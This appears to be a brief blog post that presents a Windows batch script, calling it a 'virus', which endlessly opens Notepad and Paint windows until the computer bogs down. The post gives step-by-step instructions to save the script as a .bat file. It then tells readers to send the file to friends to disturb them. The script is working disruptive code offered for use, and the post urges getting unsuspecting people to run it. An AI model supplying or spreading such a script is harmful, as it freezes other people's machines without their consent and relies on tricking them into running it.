It's simple and Easy to make a small virus in note pad in your window .
So Today I will show you
how to write a small virus to disturb your friends. Let’s follow the
following step :
1 . Open notepad ( start -> run -> type notepad)
2. Copy the following code and past it in notepad that you have been open.
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
:top
START %SystemRoot%\system32\notepad.exe
START %SystemRoot%\system32\mspaint.exe
GOTO top
GOTO top
3. Save it as .bat file ( Ex: Filename.bat …)
4. Now virus Has been create !
5. Then send it to your friends ..
Let Enjoy it ..!
But Don’t forget to click Like or Shared it . .
0 comments:
Post a Comment